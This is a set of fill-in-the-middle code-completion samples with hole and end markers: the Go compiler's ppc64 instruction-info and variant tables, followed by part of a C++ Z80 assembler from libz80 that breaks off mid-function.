for index in six.moves.xrange(WeekDay.NUM_WEEK_DAYS)
)<|fim▁end|> | if bit == '1': |
<|file_name|>prog.go<|end_file_name|><|fim▁begin|>// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package ppc64
import (
"cmd/compile/internal/gc"
"cmd/internal/obj"
"cmd/internal/obj/ppc64"
)
const (
LeftRdwr uint32 = gc.LeftRead | gc.LeftWrite
RightRdwr uint32 = gc.RightRead | gc.RightWrite
)
// This table gives the basic information about instruction
// generated by the compiler and processed in the optimizer.
// See opt.h for bit definitions.
//
// Instructions not generated need not be listed.
// As an exception to that rule, we typically write down all the
// size variants of an operation even if we just use a subset.
//
// The table is formatted for 8-space tabs.
var progtable = [ppc64.ALAST]obj.ProgInfo{
obj.ATYPE: {Flags: gc.Pseudo | gc.Skip},
obj.ATEXT: {Flags: gc.Pseudo},
obj.AFUNCDATA: {Flags: gc.Pseudo},
obj.APCDATA: {Flags: gc.Pseudo},
obj.AUNDEF: {Flags: gc.Break},
obj.AUSEFIELD: {Flags: gc.OK},
obj.ACHECKNIL: {Flags: gc.LeftRead},
obj.AVARDEF: {Flags: gc.Pseudo | gc.RightWrite},
obj.AVARKILL: {Flags: gc.Pseudo | gc.RightWrite},
obj.AVARLIVE: {Flags: gc.Pseudo | gc.LeftRead},
// NOP is an internal no-op that also stands
// for USED and SET annotations, not the Power opcode.
obj.ANOP: {Flags: gc.LeftRead | gc.RightWrite},
// Integer
ppc64.AADD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASUB: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ANEG: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AAND: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AOR: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AXOR: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULLD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULLW: {Flags: gc.SizeL | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULHD: {Flags: gc.SizeL | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULHDU: {Flags: gc.SizeL | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ADIVD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ADIVDU: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASLD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASRD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASRAD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ACMP: {Flags: gc.SizeQ | gc.LeftRead | gc.RightRead},
ppc64.ACMPU: {Flags: gc.SizeQ | gc.LeftRead | gc.RightRead},
ppc64.ATD: {Flags: gc.SizeQ | gc.RightRead},
// Floating point.
ppc64.AFADD: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFADDS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFSUB: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFSUBS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFMUL: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFMULS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFDIV: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFDIVS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFCTIDZ: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFCFID: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFCMPU: {Flags: gc.SizeD | gc.LeftRead | gc.RightRead},
ppc64.AFRSP: {Flags: gc.SizeD | gc.LeftRead | gc.RightWrite | gc.Conv},
// Moves
ppc64.AMOVB: {Flags: gc.SizeB | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVBU: {Flags: gc.SizeB | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv | gc.PostInc},
ppc64.AMOVBZ: {Flags: gc.SizeB | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVH: {Flags: gc.SizeW | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVHU: {Flags: gc.SizeW | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv | gc.PostInc},
ppc64.AMOVHZ: {Flags: gc.SizeW | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVW: {Flags: gc.SizeL | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
// there is no AMOVWU.
ppc64.AMOVWZU: {Flags: gc.SizeL | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv | gc.PostInc},
ppc64.AMOVWZ: {Flags: gc.SizeL | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVD: {Flags: gc.SizeQ | gc.LeftRead | gc.RightWrite | gc.Move},
ppc64.AMOVDU: {Flags: gc.SizeQ | gc.LeftRead | gc.RightWrite | gc.Move | gc.PostInc},
ppc64.AFMOVS: {Flags: gc.SizeF | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AFMOVD: {Flags: gc.SizeD | gc.LeftRead | gc.RightWrite | gc.Move},
// Jumps
ppc64.ABR: {Flags: gc.Jump | gc.Break},
ppc64.ABL: {Flags: gc.Call},
ppc64.ABEQ: {Flags: gc.Cjmp},
ppc64.ABNE: {Flags: gc.Cjmp},
ppc64.ABGE: {Flags: gc.Cjmp},
ppc64.ABLT: {Flags: gc.Cjmp},
ppc64.ABGT: {Flags: gc.Cjmp},
ppc64.ABLE: {Flags: gc.Cjmp},
obj.ARET: {Flags: gc.Break},
obj.ADUFFZERO: {Flags: gc.Call},
obj.ADUFFCOPY: {Flags: gc.Call},
}
var initproginfo_initialized int
func initproginfo() {
var addvariant = []int{V_CC, V_V, V_CC | V_V}
if initproginfo_initialized != 0 {
return
}
initproginfo_initialized = 1
// Perform one-time expansion of instructions in progtable to
// their CC, V, and VCC variants
var as2 int
var i int
var variant int
for as := int(0); as < len(progtable); as++ {
if progtable[as].Flags == 0 {
continue
}
variant = as2variant(as)
for i = 0; i < len(addvariant); i++ {
as2 = variant2as(as, variant|addvariant[i])<|fim▁hole|> }
}
}
}
func proginfo(p *obj.Prog) {
initproginfo()
info := &p.Info
*info = progtable[p.As]
if info.Flags == 0 {
gc.Fatalf("proginfo: unknown instruction %v", p)
}
if (info.Flags&gc.RegRead != 0) && p.Reg == 0 {
info.Flags &^= gc.RegRead
info.Flags |= gc.RightRead /*CanRegRead |*/
}
if (p.From.Type == obj.TYPE_MEM || p.From.Type == obj.TYPE_ADDR) && p.From.Reg != 0 {
info.Regindex |= RtoB(int(p.From.Reg))
if info.Flags&gc.PostInc != 0 {
info.Regset |= RtoB(int(p.From.Reg))
}
}
if (p.To.Type == obj.TYPE_MEM || p.To.Type == obj.TYPE_ADDR) && p.To.Reg != 0 {
info.Regindex |= RtoB(int(p.To.Reg))
if info.Flags&gc.PostInc != 0 {
info.Regset |= RtoB(int(p.To.Reg))
}
}
if p.From.Type == obj.TYPE_ADDR && p.From.Sym != nil && (info.Flags&gc.LeftRead != 0) {
info.Flags &^= gc.LeftRead
info.Flags |= gc.LeftAddr
}
if p.As == obj.ADUFFZERO {
info.Reguse |= 1<<0 | RtoB(ppc64.REG_R3)
info.Regset |= RtoB(ppc64.REG_R3)
}
if p.As == obj.ADUFFCOPY {
// TODO(austin) Revisit when duffcopy is implemented
info.Reguse |= RtoB(ppc64.REG_R3) | RtoB(ppc64.REG_R4) | RtoB(ppc64.REG_R5)
info.Regset |= RtoB(ppc64.REG_R3) | RtoB(ppc64.REG_R4)
}
}
// Instruction variants table. Initially this contains entries only
// for the "base" form of each instruction. On the first call to
// as2variant or variant2as, we'll add the variants to the table.
var varianttable = [ppc64.ALAST][4]int{
ppc64.AADD: {ppc64.AADD, ppc64.AADDCC, ppc64.AADDV, ppc64.AADDVCC},
ppc64.AADDC: {ppc64.AADDC, ppc64.AADDCCC, ppc64.AADDCV, ppc64.AADDCVCC},
ppc64.AADDE: {ppc64.AADDE, ppc64.AADDECC, ppc64.AADDEV, ppc64.AADDEVCC},
ppc64.AADDME: {ppc64.AADDME, ppc64.AADDMECC, ppc64.AADDMEV, ppc64.AADDMEVCC},
ppc64.AADDZE: {ppc64.AADDZE, ppc64.AADDZECC, ppc64.AADDZEV, ppc64.AADDZEVCC},
ppc64.AAND: {ppc64.AAND, ppc64.AANDCC, 0, 0},
ppc64.AANDN: {ppc64.AANDN, ppc64.AANDNCC, 0, 0},
ppc64.ACNTLZD: {ppc64.ACNTLZD, ppc64.ACNTLZDCC, 0, 0},
ppc64.ACNTLZW: {ppc64.ACNTLZW, ppc64.ACNTLZWCC, 0, 0},
ppc64.ADIVD: {ppc64.ADIVD, ppc64.ADIVDCC, ppc64.ADIVDV, ppc64.ADIVDVCC},
ppc64.ADIVDU: {ppc64.ADIVDU, ppc64.ADIVDUCC, ppc64.ADIVDUV, ppc64.ADIVDUVCC},
ppc64.ADIVW: {ppc64.ADIVW, ppc64.ADIVWCC, ppc64.ADIVWV, ppc64.ADIVWVCC},
ppc64.ADIVWU: {ppc64.ADIVWU, ppc64.ADIVWUCC, ppc64.ADIVWUV, ppc64.ADIVWUVCC},
ppc64.AEQV: {ppc64.AEQV, ppc64.AEQVCC, 0, 0},
ppc64.AEXTSB: {ppc64.AEXTSB, ppc64.AEXTSBCC, 0, 0},
ppc64.AEXTSH: {ppc64.AEXTSH, ppc64.AEXTSHCC, 0, 0},
ppc64.AEXTSW: {ppc64.AEXTSW, ppc64.AEXTSWCC, 0, 0},
ppc64.AFABS: {ppc64.AFABS, ppc64.AFABSCC, 0, 0},
ppc64.AFADD: {ppc64.AFADD, ppc64.AFADDCC, 0, 0},
ppc64.AFADDS: {ppc64.AFADDS, ppc64.AFADDSCC, 0, 0},
ppc64.AFCFID: {ppc64.AFCFID, ppc64.AFCFIDCC, 0, 0},
ppc64.AFCTID: {ppc64.AFCTID, ppc64.AFCTIDCC, 0, 0},
ppc64.AFCTIDZ: {ppc64.AFCTIDZ, ppc64.AFCTIDZCC, 0, 0},
ppc64.AFCTIW: {ppc64.AFCTIW, ppc64.AFCTIWCC, 0, 0},
ppc64.AFCTIWZ: {ppc64.AFCTIWZ, ppc64.AFCTIWZCC, 0, 0},
ppc64.AFDIV: {ppc64.AFDIV, ppc64.AFDIVCC, 0, 0},
ppc64.AFDIVS: {ppc64.AFDIVS, ppc64.AFDIVSCC, 0, 0},
ppc64.AFMADD: {ppc64.AFMADD, ppc64.AFMADDCC, 0, 0},
ppc64.AFMADDS: {ppc64.AFMADDS, ppc64.AFMADDSCC, 0, 0},
ppc64.AFMOVD: {ppc64.AFMOVD, ppc64.AFMOVDCC, 0, 0},
ppc64.AFMSUB: {ppc64.AFMSUB, ppc64.AFMSUBCC, 0, 0},
ppc64.AFMSUBS: {ppc64.AFMSUBS, ppc64.AFMSUBSCC, 0, 0},
ppc64.AFMUL: {ppc64.AFMUL, ppc64.AFMULCC, 0, 0},
ppc64.AFMULS: {ppc64.AFMULS, ppc64.AFMULSCC, 0, 0},
ppc64.AFNABS: {ppc64.AFNABS, ppc64.AFNABSCC, 0, 0},
ppc64.AFNEG: {ppc64.AFNEG, ppc64.AFNEGCC, 0, 0},
ppc64.AFNMADD: {ppc64.AFNMADD, ppc64.AFNMADDCC, 0, 0},
ppc64.AFNMADDS: {ppc64.AFNMADDS, ppc64.AFNMADDSCC, 0, 0},
ppc64.AFNMSUB: {ppc64.AFNMSUB, ppc64.AFNMSUBCC, 0, 0},
ppc64.AFNMSUBS: {ppc64.AFNMSUBS, ppc64.AFNMSUBSCC, 0, 0},
ppc64.AFRES: {ppc64.AFRES, ppc64.AFRESCC, 0, 0},
ppc64.AFRSP: {ppc64.AFRSP, ppc64.AFRSPCC, 0, 0},
ppc64.AFRSQRTE: {ppc64.AFRSQRTE, ppc64.AFRSQRTECC, 0, 0},
ppc64.AFSEL: {ppc64.AFSEL, ppc64.AFSELCC, 0, 0},
ppc64.AFSQRT: {ppc64.AFSQRT, ppc64.AFSQRTCC, 0, 0},
ppc64.AFSQRTS: {ppc64.AFSQRTS, ppc64.AFSQRTSCC, 0, 0},
ppc64.AFSUB: {ppc64.AFSUB, ppc64.AFSUBCC, 0, 0},
ppc64.AFSUBS: {ppc64.AFSUBS, ppc64.AFSUBSCC, 0, 0},
ppc64.AMTFSB0: {ppc64.AMTFSB0, ppc64.AMTFSB0CC, 0, 0},
ppc64.AMTFSB1: {ppc64.AMTFSB1, ppc64.AMTFSB1CC, 0, 0},
ppc64.AMULHD: {ppc64.AMULHD, ppc64.AMULHDCC, 0, 0},
ppc64.AMULHDU: {ppc64.AMULHDU, ppc64.AMULHDUCC, 0, 0},
ppc64.AMULHW: {ppc64.AMULHW, ppc64.AMULHWCC, 0, 0},
ppc64.AMULHWU: {ppc64.AMULHWU, ppc64.AMULHWUCC, 0, 0},
ppc64.AMULLD: {ppc64.AMULLD, ppc64.AMULLDCC, ppc64.AMULLDV, ppc64.AMULLDVCC},
ppc64.AMULLW: {ppc64.AMULLW, ppc64.AMULLWCC, ppc64.AMULLWV, ppc64.AMULLWVCC},
ppc64.ANAND: {ppc64.ANAND, ppc64.ANANDCC, 0, 0},
ppc64.ANEG: {ppc64.ANEG, ppc64.ANEGCC, ppc64.ANEGV, ppc64.ANEGVCC},
ppc64.ANOR: {ppc64.ANOR, ppc64.ANORCC, 0, 0},
ppc64.AOR: {ppc64.AOR, ppc64.AORCC, 0, 0},
ppc64.AORN: {ppc64.AORN, ppc64.AORNCC, 0, 0},
ppc64.AREM: {ppc64.AREM, ppc64.AREMCC, ppc64.AREMV, ppc64.AREMVCC},
ppc64.AREMD: {ppc64.AREMD, ppc64.AREMDCC, ppc64.AREMDV, ppc64.AREMDVCC},
ppc64.AREMDU: {ppc64.AREMDU, ppc64.AREMDUCC, ppc64.AREMDUV, ppc64.AREMDUVCC},
ppc64.AREMU: {ppc64.AREMU, ppc64.AREMUCC, ppc64.AREMUV, ppc64.AREMUVCC},
ppc64.ARLDC: {ppc64.ARLDC, ppc64.ARLDCCC, 0, 0},
ppc64.ARLDCL: {ppc64.ARLDCL, ppc64.ARLDCLCC, 0, 0},
ppc64.ARLDCR: {ppc64.ARLDCR, ppc64.ARLDCRCC, 0, 0},
ppc64.ARLDMI: {ppc64.ARLDMI, ppc64.ARLDMICC, 0, 0},
ppc64.ARLWMI: {ppc64.ARLWMI, ppc64.ARLWMICC, 0, 0},
ppc64.ARLWNM: {ppc64.ARLWNM, ppc64.ARLWNMCC, 0, 0},
ppc64.ASLD: {ppc64.ASLD, ppc64.ASLDCC, 0, 0},
ppc64.ASLW: {ppc64.ASLW, ppc64.ASLWCC, 0, 0},
ppc64.ASRAD: {ppc64.ASRAD, ppc64.ASRADCC, 0, 0},
ppc64.ASRAW: {ppc64.ASRAW, ppc64.ASRAWCC, 0, 0},
ppc64.ASRD: {ppc64.ASRD, ppc64.ASRDCC, 0, 0},
ppc64.ASRW: {ppc64.ASRW, ppc64.ASRWCC, 0, 0},
ppc64.ASUB: {ppc64.ASUB, ppc64.ASUBCC, ppc64.ASUBV, ppc64.ASUBVCC},
ppc64.ASUBC: {ppc64.ASUBC, ppc64.ASUBCCC, ppc64.ASUBCV, ppc64.ASUBCVCC},
ppc64.ASUBE: {ppc64.ASUBE, ppc64.ASUBECC, ppc64.ASUBEV, ppc64.ASUBEVCC},
ppc64.ASUBME: {ppc64.ASUBME, ppc64.ASUBMECC, ppc64.ASUBMEV, ppc64.ASUBMEVCC},
ppc64.ASUBZE: {ppc64.ASUBZE, ppc64.ASUBZECC, ppc64.ASUBZEV, ppc64.ASUBZEVCC},
ppc64.AXOR: {ppc64.AXOR, ppc64.AXORCC, 0, 0},
}
var initvariants_initialized int
func initvariants() {
if initvariants_initialized != 0 {
return
}
initvariants_initialized = 1
var j int
for i := int(0); i < len(varianttable); i++ {
if varianttable[i][0] == 0 {
// Instruction has no variants
varianttable[i][0] = i
continue
}
// Copy base form to other variants
if varianttable[i][0] == i {
for j = 0; j < len(varianttable[i]); j++ {
varianttable[varianttable[i][j]] = varianttable[i]
}
}
}
}
// as2variant returns the variant (V_*) flags of instruction as.
func as2variant(as int) int {
initvariants()
for i := int(0); i < len(varianttable[as]); i++ {
if varianttable[as][i] == as {
return i
}
}
gc.Fatalf("as2variant: instruction %v is not a variant of itself", obj.Aconv(as))
return 0
}
// variant2as returns the instruction as with the given variant (V_*) flags.
// If no such variant exists, this returns 0.
func variant2as(as int, flags int) int {
initvariants()
return varianttable[as][flags]
}<|fim▁end|> | if as2 != 0 && progtable[as2].Flags == 0 {
progtable[as2] = progtable[as] |
<|file_name|>z80_assembler.cpp<|end_file_name|><|fim▁begin|>/**
* libz80
* Copyright (C) 2015 David Jolly
* ----------------------
*
* libz80 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* libz80 is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <fstream>
#include "../include/z80.h"
#include "../include/z80_assembler_type.h"
namespace Z80_NS {
namespace Z80_LANG_NS {
#define CODE_COUNT 1
#define CODE_EXTENDED 2
#define CODE_OFFSET 0
#define COND_EXPRESSION_COUNT 3
#define COND_EXPRESSION_OPERAND_LEFT 0
#define COND_EXPRESSION_OPERAND_RIGHT 2
#define COND_EXPRESSION_OPERATOR 1
#define DEFS_EXPRESSION_COUNT 2
#define DEFS_EXPRESSION_OFFSET 1
#define DEFS_EXPRESSION_VALUE_OFFSET 0
#define EXPRESSION_COUNT_MIN 1
#define EXPRESSION_LEFT_OFF 0
#define EXPRESSION_RIGHT_OFF 1
#define IF_CONDITIONAL_COUNT_MAX 3
#define IF_CONDITIONAL_COUNT_MIN 2
#define IF_CONDITIONAL_ID_OFF 0
#define IF_CONDITIONAL_STMT_MAIN_OFF 1
#define IF_CONDITIONAL_STMT_AUX_OFF 2
#define MACRO_CHILD_OFF 0
#define MACRO_COUNT 1
#define OPERATOR_CHILD_OFF 0
#define OPERATOR_COUNT 1
#define UNARY_OPERATOR_CHILD_OFF 0
#define UNARY_OPERATOR_COUNT 1
#define THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT(_EXCEPT_, _TOK_, _VERB_) \
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(_EXCEPT_, \
"%s\n%lu:%s", CHECK_STR(z80_token::as_string(_TOK_)), \
(TOKEN_CONTEXT_ROW((_TOK_).context()) + 1), \
CHECK_STR(z80_token::token_exception_as_string((_TOK_).context(), _VERB_)))
#define THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(_EXCEPT_, _TOK_, _VERB_, _FORMAT_, ...) \
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(_EXCEPT_, _FORMAT_ "\n%lu:%s", __VA_ARGS__, \
(TOKEN_CONTEXT_ROW((_TOK_).context()) + 1), \
CHECK_STR(z80_token::token_exception_as_string((_TOK_).context(), _VERB_)))
bool
operator==(
__in const z80_bin_t &left,
__in const z80_bin_t &right
)
{
bool result;
size_t iter = 0;
TRACE_ENTRY();
result = (&left == &right);
if(!result) {
result = (left.size() == right.size());
if(result) {
for(; iter < left.size(); ++iter) {
if(left.at(iter) != right.at(iter)) {
result = false;
break;
}
}
}
}
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
bool
operator!=(
__in const z80_bin_t &left,
__in const z80_bin_t &right
)
{
bool result;
TRACE_ENTRY();
result = !(left == right);
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
bool
operator==(
__in const z80_lst_t &left,
__in const z80_lst_t &right
)
{
bool result;
z80_lst_t::const_iterator iter, right_iter;
TRACE_ENTRY();
result = (&left == &right);
if(!result) {
result = (left.size() == right.size());
if(result) {
for(iter = left.begin(); iter != left.end(); ++iter) {
right_iter = right.find(iter->first);
if((right_iter == right.end())
|| (right_iter->second != iter->second)) {
result = false;
break;
}
}
}
}
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
bool
operator!=(
__in const z80_lst_t &left,
__in const z80_lst_t &right
)
{
bool result;
TRACE_ENTRY();
result = !(left == right);
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
_z80_assembler::_z80_assembler(
__in_opt const std::string &input,
__in_opt bool is_file
)
{
TRACE_ENTRY();
z80_assembler::set(input, is_file);
TRACE_EXIT("Return Value: 0x%x", 0);
}
_z80_assembler::_z80_assembler(
__in const _z80_assembler &other
) :
z80_parser(other),
m_binary(other.m_binary),
m_identifier_map(other.m_identifier_map),
m_label_map(other.m_label_map)
{
TRACE_ENTRY();
TRACE_EXIT("Return Value: 0x%x", 0);
}
_z80_assembler::~_z80_assembler(void)
{
TRACE_ENTRY();
TRACE_EXIT("Return Value: 0x%x", 0);
}
_z80_assembler &
_z80_assembler::operator=(
__in const _z80_assembler &other
)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
z80_parser::operator=(other);
m_binary = other.m_binary;
m_identifier_map = other.m_identifier_map;
m_label_map = other.m_label_map;
TRACE_EXIT("Return Value: 0x%p", this);
return *this;
}
z80_bin_t
_z80_assembler::binary(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
TRACE_EXIT("Return Value: size: %lu", m_binary.size());
return m_binary;
}
std::string
_z80_assembler::binary_as_string(
__in const z80_bin_t &binary,
__in_opt bool verbose
)
{
size_t iter = 0;
std::stringstream result;
TRACE_ENTRY();
if(verbose) {
result << "Binary size: " << std::setprecision(3)
<< (binary.size() / BYTES_PER_KBYTE)
<< " KB (" << binary.size() << " bytes)"
<< std::endl;
}
for(; iter < binary.size(); ++iter) {
if(!(iter % BLOCK_LEN)) {
if(iter) {
result << std::endl;
}
result << VALUE_AS_HEX(uint16_t, iter) << " |";
}
result << " " << VALUE_AS_HEX(uint8_t, binary.at(iter));
}
TRACE_EXIT("Return Value: %s", CHECK_STR(result.str()));
return result.str();
}
void
_z80_assembler::clear(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
z80_parser::reset();
m_binary.clear();
m_identifier_map.clear();
m_label_map.clear();
TRACE_EXIT("Return Value: 0x%x", 0);
}
size_t
_z80_assembler::discover(void)
{
size_t result;
z80_node_factory_ptr node_fact = NULL;
z80_token_factory_ptr tok_fact = NULL;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
node_fact = z80_node_factory::acquire();
tok_fact = z80_token_factory::acquire();
z80_assembler::clear();
run_preprocessor(tok_fact, node_fact);
run_assembler(tok_fact, node_fact);
result = m_binary.size();
TRACE_EXIT("Return Value: size: %lu", result);
return result;
}
void
_z80_assembler::evaluate_command(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
uint16_t val;
uint32_t code;
z80_token tok;
size_t iter, off;
z80_command_info_comp_t info;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_CODE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_COMMAND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(!tok.length()) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
code = tok.code();
if(!determine_command_simple(tok.subtype())) {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() == CODE_COUNT) {
val = evaluate_expression(statement, node.children().at(CODE_OFFSET), origin,
token_factory, node_factory);
info = determine_command_information(tok.subtype(), tok.mode());
if(determine_command_relative(tok.subtype())) {
if(val > origin) {
val = (val - origin - tok.length()) % UINT8_MAX;
} else {
val = UINT8_MAX - ((origin - val) % UINT8_MAX)
- (info.first.second - info.second.size());
}
}
off = info.second.front();
if(info.second.size() == CODE_EXTENDED) {
((uint8_t *) &code)[off] = (val & UINT8_MAX);
((uint8_t *) &code)[++off] = ((val >> BITS_PER_BYTE) & UINT8_MAX);
} else {
((uint8_t *) &code)[off] = (val & UINT8_MAX);
}
}
}
for(iter = 0; iter < tok.length(); ++iter) {
m_binary.push_back((code >> (iter * BITS_PER_BYTE)) & UINT8_MAX);
}
origin += tok.length();
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit);
}
void
_z80_assembler::evaluate_directive(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__in const std::string &base_path,
__inout bool &exit_condition
)
{
uint8_t val;
z80_token tok;
std::string text;
size_t len, count = 0;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_DIRECTIVE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
switch(tok.subtype()) {
case DIRECTIVE_DEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
text = tok.text();
iter = m_identifier_map.find(text);
if(iter != m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_DUPLICATE_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.insert(std::pair<std::string, uint16_t>(text,
evaluate_expression(statement, ++offset, origin,
token_factory, node_factory)));
break;
case DIRECTIVE_DEFINE_BYTE:
case DIRECTIVE_DEFINE_WORD:
evaluate_expression_list(statement, ++offset, origin, token_factory,
node_factory, exit_condition, tok.subtype() == DIRECTIVE_DEFINE_WORD);
break;
case DIRECTIVE_DEFINE_SPACE: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() != DEFS_EXPRESSION_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
val = evaluate_expression(statement, node.children().at(DEFS_EXPRESSION_VALUE_OFFSET),
origin, token_factory, node_factory);
len = evaluate_expression(statement, node.children().at(DEFS_EXPRESSION_OFFSET),
origin, token_factory, node_factory);
for(; count < len; ++count) {
m_binary.push_back(val);
}
origin += len;
} break;
case DIRECTIVE_END_SEGMENT:
exit_condition = true;
break;
case DIRECTIVE_IF_CONDITIONAL: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
if(evaluate_expression_conditional(statement,
node.children().at(IF_CONDITIONAL_ID_OFF),
origin, token_factory, node_factory)) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_IF_DEFINED: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, node.children().at(IF_CONDITIONAL_ID_OFF),
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
